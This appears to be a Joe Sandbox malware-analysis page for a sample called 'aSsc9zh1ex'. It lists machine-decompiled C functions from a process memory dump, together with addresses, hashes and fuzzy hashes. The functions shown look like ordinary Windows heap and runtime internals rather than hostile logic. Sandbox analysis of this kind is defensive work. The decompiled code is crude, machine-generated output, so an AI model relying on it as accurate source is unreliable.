                                                                                                                              0x1d777f61
                                                                                                                              0x1d777f57
                                                                                                                              0x00000000
                                                                                                                              0x1d777f57
                                                                                                                              0x1d777f46
                                                                                                                              0x1d777f46
                                                                                                                              0x1d777f5f
                                                                                                                              0x00000000
                                                                                                                              0x1d777f13
                                                                                                                              0x1d777f13
                                                                                                                              0x1d777f13
                                                                                                                              0x1d777f18
                                                                                                                              0x1d777f1c
                                                                                                                              0x1d777f1e
                                                                                                                              0x1d777f21
                                                                                                                              0x1d777f24
                                                                                                                              0x1d777f24
                                                                                                                              0x00000000
                                                                                                                              0x1d777f27
                                                                                                                              0x1d777f11
                                                                                                                              0x1d7b4989
                                                                                                                              0x1d7b498e
                                                                                                                              0x1d777ea7
                                                                                                                              0x1d777eb2
                                                                                                                              0x1d777eb7
                                                                                                                              0x1d777ebc
                                                                                                                              0x00000000
                                                                                                                              0x1d7b499e
                                                                                                                              0x1d777ec4
                                                                                                                              0x1d777ec8
                                                                                                                              0x00000000
                                                                                                                              0x1d777ec8
                                                                                                                              0x00000000
                                                                                                                              0x1d7b498e
                                                                                                                              0x1d777e9c
                                                                                                                              0x1d777ea1
                                                                                                                              0x00000000
                                                                                                                              0x1d7b49a8
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 512e79ea922a50fc055533607aad3d2f208776feac80ac31e70b7382f927fd1a
                                                                                                                              • Instruction ID: f351a31771926a3b10dcf3a7576e7a0577600993afe1e2f3085f6769a48fb267
                                                                                                                              • Opcode Fuzzy Hash: 512e79ea922a50fc055533607aad3d2f208776feac80ac31e70b7382f927fd1a
                                                                                                                              • Instruction Fuzzy Hash: 6C31B031A04611DBCF25CF29D544A7BB7E5EF45724B02886AE849DB250E770D841C7D2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D747DB6 Relevance: .1, Instructions: 102COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 82%
                                                                                                                              			E1D747DB6(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				signed char _t33;
				char* _t43;
				void* _t48;
				signed char _t62;
				void* _t63;
				void* _t80;
				void* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E1D753C40() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E1D814F1D(_v8, _t80);
					}
					L1D752330(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E1D7524D0(_t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E1D8149AD(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E1D7524D0(_t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E1D7846B0();
						if(_a4 != 0) {
							L1D752330(_t48, _t81);
						}
					} else {
						_t13 = _t80 + 0x98; // 0x98
						E1D74754C(_v8 + 0xc, _t13);
						_t16 = _t80 + 0xb0; // 0xb0
						E1D74754C(_v8 + 8, _t16);
						E1D7477F9(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E1D7524D0(_t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E1D7524D0(_t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t7 = _t80 + 0x90; // 0x90
					E1D7524D0(_t7);
				}
				return 0;
			}













                                                                                                                              0x1d747dc1
                                                                                                                              0x1d747dc3
                                                                                                                              0x1d747dc5
                                                                                                                              0x1d747dcf
                                                                                                                              0x1d747dd4
                                                                                                                              0x1d747e10
                                                                                                                              0x1d747e1a
                                                                                                                              0x1d7a1865
                                                                                                                              0x1d747e20
                                                                                                                              0x1d747e20
                                                                                                                              0x1d747e20
                                                                                                                              0x1d747e28
                                                                                                                              0x1d7a1874
                                                                                                                              0x1d7a1874
                                                                                                                              0x1d747e2f
                                                                                                                              0x1d747e3b
                                                                                                                              0x1d7a187f
                                                                                                                              0x1d7a1884
                                                                                                                              0x1d7a188b
                                                                                                                              0x1d7a188b
                                                                                                                              0x1d7a1896
                                                                                                                              0x1d7a189b
                                                                                                                              0x1d7a18a2
                                                                                                                              0x1d7a18a7
                                                                                                                              0x1d7a18a9
                                                                                                                              0x1d7a18aa
                                                                                                                              0x1d7a18ab
                                                                                                                              0x1d7a18b3
                                                                                                                              0x1d7a18ba
                                                                                                                              0x1d7a18ba
                                                                                                                              0x1d747e41
                                                                                                                              0x1d747e44
                                                                                                                              0x1d747e4d
                                                                                                                              0x1d747e55
                                                                                                                              0x1d747e5e
                                                                                                                              0x1d747e68
                                                                                                                              0x1d747e70
                                                                                                                              0x1d747e76
                                                                                                                              0x1d747e7b
                                                                                                                              0x1d747e81
                                                                                                                              0x1d747e87
                                                                                                                              0x1d747e8d
                                                                                                                              0x1d747e96
                                                                                                                              0x1d747e98
                                                                                                                              0x1d747e9f
                                                                                                                              0x1d747e9f
                                                                                                                              0x1d747ea4
                                                                                                                              0x1d747ea4
                                                                                                                              0x00000000
                                                                                                                              0x1d747ea6
                                                                                                                              0x1d747dd8
                                                                                                                              0x1d747dde
                                                                                                                              0x1d747de7
                                                                                                                              0x1d747df2
                                                                                                                              0x1d747df9
                                                                                                                              0x1d747df9
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
                                                                                                                              • Instruction ID: e18a7eab2005af911c31741901e0452672a01b95bbe58e23b31b918d34c23b27
                                                                                                                              • Opcode Fuzzy Hash: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
                                                                                                                              • Instruction Fuzzy Hash: 39315734A05596BEDB06DB78D880BEAF764BF02224F24C25ED11C4B211C734B94ACBE3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77FD40 Relevance: .1, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E1D77FD40(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = __edx + 0x00000007 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x184 + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E1D77FE18(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E1D76BC50(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

















                                                                                                                              0x1d77fd48
                                                                                                                              0x1d77fd4b
                                                                                                                              0x1d77fd4e
                                                                                                                              0x1d77fd57
                                                                                                                              0x1d7b91fa
                                                                                                                              0x1d7b91fa
                                                                                                                              0x1d7b920b
                                                                                                                              0x1d7b9220
                                                                                                                              0x1d7b9220
                                                                                                                              0x1d7b9225
                                                                                                                              0x1d77fdf0
                                                                                                                              0x1d77fdf6
                                                                                                                              0x1d77fdf6
                                                                                                                              0x1d77fd5d
                                                                                                                              0x1d77fd66
                                                                                                                              0x1d77fd6c
                                                                                                                              0x1d77fd6f
                                                                                                                              0x1d77fd75
                                                                                                                              0x1d7b91c8
                                                                                                                              0x1d77fe0b
                                                                                                                              0x1d77fe0b
                                                                                                                              0x1d77fe0b
                                                                                                                              0x1d77fd7b
                                                                                                                              0x1d77fd84
                                                                                                                              0x1d77fdf9
                                                                                                                              0x1d77fe05
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d77fe05
                                                                                                                              0x1d77fd86
                                                                                                                              0x1d77fd8e
                                                                                                                              0x00000000
                                                                                                                              0x1d77fd97
                                                                                                                              0x1d77fd97
                                                                                                                              0x1d77fd9c
                                                                                                                              0x1d77fda7
                                                                                                                              0x1d7b91d3
                                                                                                                              0x1d7b91d9
                                                                                                                              0x1d7b91d9
                                                                                                                              0x00000000
                                                                                                                              0x1d7b91d3
                                                                                                                              0x1d77fdb0
                                                                                                                              0x1d77fdb3
                                                                                                                              0x1d77fdb7
                                                                                                                              0x1d77fdb9
                                                                                                                              0x1d77fdbe
                                                                                                                              0x1d77fdee
                                                                                                                              0x1d77fdee
                                                                                                                              0x00000000
                                                                                                                              0x1d77fdee
                                                                                                                              0x1d77fdc4
                                                                                                                              0x1d77fdc7
                                                                                                                              0x1d7b91e1
                                                                                                                              0x1d7b91e4
                                                                                                                              0x1d7b91f1
                                                                                                                              0x1d7b91f3
                                                                                                                              0x1d77fdeb
                                                                                                                              0x1d77fdeb
                                                                                                                              0x00000000
                                                                                                                              0x1d77fdeb
                                                                                                                              0x1d7b91e7
                                                                                                                              0x00000000
                                                                                                                              0x1d7b91e7
                                                                                                                              0x1d77fdd8
                                                                                                                              0x1d77fdd8
                                                                                                                              0x1d77fdda
                                                                                                                              0x1d77fde0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d77fe14
                                                                                                                              0x1d77fe14
                                                                                                                              0x1d77fde2
                                                                                                                              0x1d77fde5
                                                                                                                              0x1d77fde9
                                                                                                                              0x00000000
                                                                                                                              0x1d77fde9

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 931d08bb85ae22d6e0c222ce6d1ad0a02c3e9b6ce2305a6a1c01371c741d528e
                                                                                                                              • Instruction ID: 7378e0d09024188ec18813e9d8d26727da0d7e003583f6a898af4075dbf20105
                                                                                                                              • Opcode Fuzzy Hash: 931d08bb85ae22d6e0c222ce6d1ad0a02c3e9b6ce2305a6a1c01371c741d528e
                                                                                                                              • Instruction Fuzzy Hash: 79319E36604205CFCB15CF29C598AA6F7E6FF85324B25C95EE4698B215DB31E802CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73DE45 Relevance: .1, Instructions: 98COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 62%
                                                                                                                              			E1D73DE45(intOrPtr __ecx, intOrPtr _a4) {
				void* _v32;
				intOrPtr _v60;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _v88;
				intOrPtr _v92;
				void* _v96;
				void* _v100;
				void* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t63;
				intOrPtr* _t66;
				void* _t69;
				short* _t72;
				short _t74;
				intOrPtr _t75;
				intOrPtr* _t78;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr* _t90;
				char _t94;
				void* _t107;
				intOrPtr _t112;
				char _t114;
				void* _t115;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr _t119;
				intOrPtr* _t122;
				void* _t123;
				intOrPtr _t124;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr _t137;
				short* _t138;
				void* _t139;
				void* _t141;
				short* _t143;
				intOrPtr _t145;
				void* _t147;
				signed int _t152;
				signed int _t154;
				signed int _t155;

				_t63 =  *0x1d83664c; // 0x1abf6c8
				_t112 = __ecx;
				L1D7453C0(_t63 + 0x18);
				_t117 =  *0x1d83664c; // 0x1abf6c8
				_t1 = _t117 + 0x10; // 0x1abf6d8
				_t132 = _t1;
				_t66 =  *_t132;
				while(_t66 != _t132) {
					_t2 = _t66 - 8; // -8
					_t143 = _t2;
					if( *((intOrPtr*)(_t143 + 4)) != _t112) {
						_t66 =  *_t66;
						continue;
					} else {
						asm("lock inc dword [esi+0x14]");
						_t130 =  *0x1d83664c; // 0x1abf6c8
						E1D7452F0(_t130 + 0x18, _t130 + 0x18);
						L4:
						_t72 = _t143;
						L5:
						return _t72;
					}
					L33:
				}
				_t4 = _t117 + 0x18; // 0x1abf6e0
				E1D7452F0(_t117, _t4);
				_t69 = 0x18;
				_t143 = E1D755D90(_t117,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t69);
				if(_t143 == 0) {
					_t72 = 0;
					goto L5;
				} else {
					 *((intOrPtr*)(_t143 + 8)) = 0;
					 *((intOrPtr*)(_t143 + 0xc)) = 0;
					 *_t143 = 0x913;
					_t74 = 0x18;
					 *((short*)(_t143 + 2)) = _t74;
					_t75 =  *0x1d83664c; // 0x1abf6c8
					 *((intOrPtr*)(_t143 + 4)) = _t112;
					 *((intOrPtr*)(_t143 + 0x14)) = 1;
					 *((intOrPtr*)(_t143 + 0x10)) = 0;
					L1D752330(_t75 + 0x18, _t75 + 0x18);
					_t137 =  *0x1d83664c; // 0x1abf6c8
					_t12 = _t137 + 0x10; // 0x1abf6d8
					_t78 = _t12;
					_t118 =  *_t78;
					if(_t118 != _t78) {
						while(1) {
							_t138 = _t118 - 8;
							if( *((intOrPtr*)(_t138 + 4)) == _t112) {
								break;
							}
							_t118 =  *_t118;
							if(_t118 != _t78) {
								continue;
							} else {
								_t137 =  *0x1d83664c; // 0x1abf6c8
								goto L8;
							}
							goto L33;
						}
						asm("lock inc dword [edi+0x14]");
						_t119 =  *0x1d83664c; // 0x1abf6c8
						E1D7524D0(_t119 + 0x18);
						E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t143);
						_t72 = _t138;
						goto L5;
					} else {
						L8:
						_t13 = _t78 + 4; // 0x1abf6d8
						_t133 =  *_t13;
						_t14 = _t143 + 8; // 0x8
						_t122 = _t14;
						if( *_t133 != _t78) {
							_t123 = 3;
							asm("int 0x29");
							_t154 = (_t152 & 0xfffffff8) - 0x4c;
							 *(_t154 + 0x48) =  *0x1d83b370 ^ _t154;
							_push(_t112);
							_push(_t143);
							_t83 = _t133;
							_t114 = 0;
							_push(_t137);
							_v84 = _t83;
							_t139 = _t123;
							_t145 =  *((intOrPtr*)(_t83 + 0xc8));
							_v80 = _t145;
							E1D788F40( &_v72, 0, 0x30);
							_t86 =  *((intOrPtr*)(_t139 + 0x70));
							_t155 = _t154 + 0xc;
							_v88 = _t86;
							_t87 = _t86;
							if(_t87 == 0) {
								_push(5);
								 *((char*)(_t139 + 0x6a)) = 0;
								 *((intOrPtr*)(_t139 + 0x6c)) = 0;
								goto L15;
							} else {
								_t107 = _t87 - 1;
								if(_t107 != 0) {
									if(_t107 == 1) {
										_push(0xa);
										goto L15;
									} else {
										_t94 = 0;
									}
								} else {
									_push(4);
									L15:
									_pop(_t88);
									_v92 = _t88;
									if(_a4 == _t114 && _t145 != 0 && _t88 != 0xa &&  *((char*)(_t139 + 0x6b)) == 1) {
										L1D752330(_t88, _t145 + 0x1c);
										_t128 = _v84;
										 *((intOrPtr*)(_t128 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
										 *((intOrPtr*)(_t128 + 0x88)) =  *((intOrPtr*)(_t139 + 0x68));
										 *((intOrPtr*)(_t128 + 0x8c)) =  *((intOrPtr*)(_t139 + 0x6c));
										 *((intOrPtr*)(_t128 + 0x90)) = _v92;
										 *((intOrPtr*)(_t128 + 0x20)) = _t114;
										E1D7524D0(_t145 + 0x1c);
									}
									_t124 = _v92;
									_t90 =  *((intOrPtr*)(_v84 + 0x20));
									_t133 =  *_t90;
									_v84 =  *((intOrPtr*)(_t90 + 4));
									 *((intOrPtr*)(_t155 + 0x28)) =  *((intOrPtr*)(_t139 + 0x68));
									_v72 = 0x30;
									 *((intOrPtr*)(_t155 + 0x24)) = _t124;
									_v60 =  *((intOrPtr*)(_t139 + 0x6c));
									asm("movsd");
									_v88 = _t133;
									_v76 = 0x30;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									if(_t133 != 0) {
										 *0x1d8391e0(_t124, _v84,  &_v76,  &_v72);
										_t114 = _v88();
									}
									_t94 = _t114;
								}
							}
							_pop(_t141);
							_pop(_t147);
							_pop(_t115);
							return E1D784B50(_t94, _t115,  *(_t155 + 0x54) ^ _t155, _t133, _t141, _t147);
						} else {
							 *_t122 = _t78;
							 *((intOrPtr*)(_t122 + 4)) = _t133;
							 *_t133 = _t122;
							 *((intOrPtr*)(_t78 + 4)) = _t122;
							_t17 = _t137 + 0x18; // 0x1abf6e0
							E1D7524D0(_t17);
							goto L4;
						}
					}
				}
				goto L33;
			}






















































                                                                                                                              0x1d73de45
                                                                                                                              0x1d73de50
                                                                                                                              0x1d73de53
                                                                                                                              0x1d73de58
                                                                                                                              0x1d73de5e
                                                                                                                              0x1d73de5e
                                                                                                                              0x1d73de61
                                                                                                                              0x1d73de63
                                                                                                                              0x1d73de67
                                                                                                                              0x1d73de67
                                                                                                                              0x1d73de6d
                                                                                                                              0x1d79d69b
                                                                                                                              0x00000000
                                                                                                                              0x1d73de73
                                                                                                                              0x1d73de73
                                                                                                                              0x1d73de77
                                                                                                                              0x1d73de81
                                                                                                                              0x1d73de86
                                                                                                                              0x1d73de86
                                                                                                                              0x1d73de88
                                                                                                                              0x1d73de8b
                                                                                                                              0x1d73de8b
                                                                                                                              0x00000000
                                                                                                                              0x1d73de6d
                                                                                                                              0x1d73de8c
                                                                                                                              0x1d73de90
                                                                                                                              0x1d73de97
                                                                                                                              0x1d73deaa
                                                                                                                              0x1d73deae
                                                                                                                              0x1d73df15
                                                                                                                              0x00000000
                                                                                                                              0x1d73deb0
                                                                                                                              0x1d73deb0
                                                                                                                              0x1d73deb8
                                                                                                                              0x1d73debb
                                                                                                                              0x1d73dec0
                                                                                                                              0x1d73dec1
                                                                                                                              0x1d73dec5
                                                                                                                              0x1d73decd
                                                                                                                              0x1d73ded1
                                                                                                                              0x1d73ded8
                                                                                                                              0x1d73dedb
                                                                                                                              0x1d73dee0
                                                                                                                              0x1d73dee6
                                                                                                                              0x1d73dee6
                                                                                                                              0x1d73dee9
                                                                                                                              0x1d73deed
                                                                                                                              0x1d79d6a2
                                                                                                                              0x1d79d6a2
                                                                                                                              0x1d79d6a8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79d6aa
                                                                                                                              0x1d79d6ae
                                                                                                                              0x00000000
                                                                                                                              0x1d79d6b0
                                                                                                                              0x1d79d6b0
                                                                                                                              0x00000000
                                                                                                                              0x1d79d6b0
                                                                                                                              0x00000000
                                                                                                                              0x1d79d6ae
                                                                                                                              0x1d79d6bb
                                                                                                                              0x1d79d6bf
                                                                                                                              0x1d79d6c9
                                                                                                                              0x1d79d6db
                                                                                                                              0x1d79d6e0
                                                                                                                              0x00000000
                                                                                                                              0x1d73def3
                                                                                                                              0x1d73def3
                                                                                                                              0x1d73def3
                                                                                                                              0x1d73def3
                                                                                                                              0x1d73def6
                                                                                                                              0x1d73def6
                                                                                                                              0x1d73defb
                                                                                                                              0x1d73df1e
                                                                                                                              0x1d73df1f
                                                                                                                              0x1d73df29
                                                                                                                              0x1d73df33
                                                                                                                              0x1d73df37
                                                                                                                              0x1d73df38
                                                                                                                              0x1d73df39
                                                                                                                              0x1d73df3b
                                                                                                                              0x1d73df3d
                                                                                                                              0x1d73df40
                                                                                                                              0x1d73df44
                                                                                                                              0x1d73df46
                                                                                                                              0x1d73df52
                                                                                                                              0x1d73df56
                                                                                                                              0x1d73df5b
                                                                                                                              0x1d73df5e
                                                                                                                              0x1d73df61
                                                                                                                              0x1d73df65
                                                                                                                              0x1d73df67
                                                                                                                              0x1d73e058
                                                                                                                              0x1d73e05a
                                                                                                                              0x1d73e05d
                                                                                                                              0x00000000
                                                                                                                              0x1d73df6d
                                                                                                                              0x1d73df6d
                                                                                                                              0x1d73df70
                                                                                                                              0x1d79d6ea
                                                                                                                              0x1d79d6f3
                                                                                                                              0x00000000
                                                                                                                              0x1d79d6ec
                                                                                                                              0x1d79d6ec
                                                                                                                              0x1d79d6ec
                                                                                                                              0x1d73df76
                                                                                                                              0x1d73df76
                                                                                                                              0x1d73df78
                                                                                                                              0x1d73df78
                                                                                                                              0x1d73df79
                                                                                                                              0x1d73df80
                                                                                                                              0x1d73e019
                                                                                                                              0x1d73e024
                                                                                                                              0x1d73e02c
                                                                                                                              0x1d73e032
                                                                                                                              0x1d73e03b
                                                                                                                              0x1d73e045
                                                                                                                              0x1d73e04b
                                                                                                                              0x1d73e04e
                                                                                                                              0x1d73e04e
                                                                                                                              0x1d73df8d
                                                                                                                              0x1d73df91
                                                                                                                              0x1d73df94
                                                                                                                              0x1d73df99
                                                                                                                              0x1d73dfa0
                                                                                                                              0x1d73dfab
                                                                                                                              0x1d73dfb3
                                                                                                                              0x1d73dfb7
                                                                                                                              0x1d73dfbb
                                                                                                                              0x1d73dfbc
                                                                                                                              0x1d73dfc0
                                                                                                                              0x1d73dfc8
                                                                                                                              0x1d73dfc9
                                                                                                                              0x1d73dfca
                                                                                                                              0x1d73dfcd
                                                                                                                              0x1d73dfe0
                                                                                                                              0x1d73dfea
                                                                                                                              0x1d73dfea
                                                                                                                              0x1d73dfec
                                                                                                                              0x1d73dfec
                                                                                                                              0x1d73df70
                                                                                                                              0x1d73dff2
                                                                                                                              0x1d73dff3
                                                                                                                              0x1d73dff4
                                                                                                                              0x1d73dfff
                                                                                                                              0x1d73defd
                                                                                                                              0x1d73defd
                                                                                                                              0x1d73deff
                                                                                                                              0x1d73df02
                                                                                                                              0x1d73df04
                                                                                                                              0x1d73df07
                                                                                                                              0x1d73df0b
                                                                                                                              0x00000000
                                                                                                                              0x1d73df0b
                                                                                                                              0x1d73defb
                                                                                                                              0x1d73deed
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 66c08b50ff38368a509b76f897898957aef790d483691f0407495b8cdc7cbbcb
                                                                                                                              • Instruction ID: 81ec3425fa88484d770ca6e334f281e866e6345b039284ca106b627c5eb8ab57
                                                                                                                              • Opcode Fuzzy Hash: 66c08b50ff38368a509b76f897898957aef790d483691f0407495b8cdc7cbbcb
                                                                                                                              • Instruction Fuzzy Hash: C331D4B2240642EFC316CF1CE894B26B7B5FF857A9B51891EE1098B712D735F842CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D805D43 Relevance: .1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 61%
                                                                                                                              			E1D805D43(intOrPtr* __ecx, intOrPtr* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t51;
				intOrPtr* _t53;
				signed int _t58;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t66;
				signed int _t67;

				_v8 =  *0x1d83b370 ^ _t67;
				_v16 =  *__edx;
				_t53 = __ecx;
				_v12 =  *((intOrPtr*)(__edx + 4));
				_t63 = E1D755D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1000);
				if(_t63 != 0) {
					do {
						_v20 = 0x1000;
						_push( &_v20);
						_push(_t63);
						_push( &_v24);
						_push(0);
						_push(0);
						_push( &_v16);
						_t64 = E1D783FE0();
						if(_t64 < 0) {
							goto L12;
						}
						asm("sbb ecx, ecx");
						_t62 = 0;
						_t58 =  !( ~(_v20 & 7)) & _v20;
						_v20 = _t58;
						_t66 = _t58 >> 3;
						if(_t66 == 0) {
							L9:
							_t19 = _t58 + 8; // 0x1008
							_t62 = _t19;
							if(_t62 <= 0x1000) {
								_t58 = _t62;
								 *((intOrPtr*)(_t63 + _t66 * 8)) =  *_t53;
								_t22 = _t53 + 4; // 0x8b55ff8b
								 *((short*)(_t63 + 4 + _t66 * 8)) =  *_t22;
								_v20 = _t58;
							}
							L11:
							_push(1);
							_push(_v24);
							_push(0);
							_push(0);
							_push(_t58);
							_push(_t63);
							_push( &_v16);
							_t64 = E1D784690();
							goto L12;
						}
						_t51 =  *_t53;
						do {
							if( *((intOrPtr*)(_t63 + _t62 * 8)) != _t51) {
								goto L8;
							}
							_t18 = _t53 + 4; // 0x8b55ff8b
							if( *((intOrPtr*)(_t63 + 4 + _t62 * 8)) ==  *_t18) {
								goto L11;
							}
							_t51 =  *_t53;
							L8:
							_t62 = _t62 + 1;
						} while (_t62 < _t66);
						goto L9;
						L12:
					} while (_t64 == 0xc0000001);
					E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63);
					L14:
					return E1D784B50(_t64, _t53, _v8 ^ _t67, _t62, _t63, _t64);
				}
				_t64 = 0xc0000017;
				goto L14;
			}



















                                                                                                                              0x1d805d52
                                                                                                                              0x1d805d59
                                                                                                                              0x1d805d5c
                                                                                                                              0x1d805d62
                                                                                                                              0x1d805d7a
                                                                                                                              0x1d805d7e
                                                                                                                              0x1d805d8a
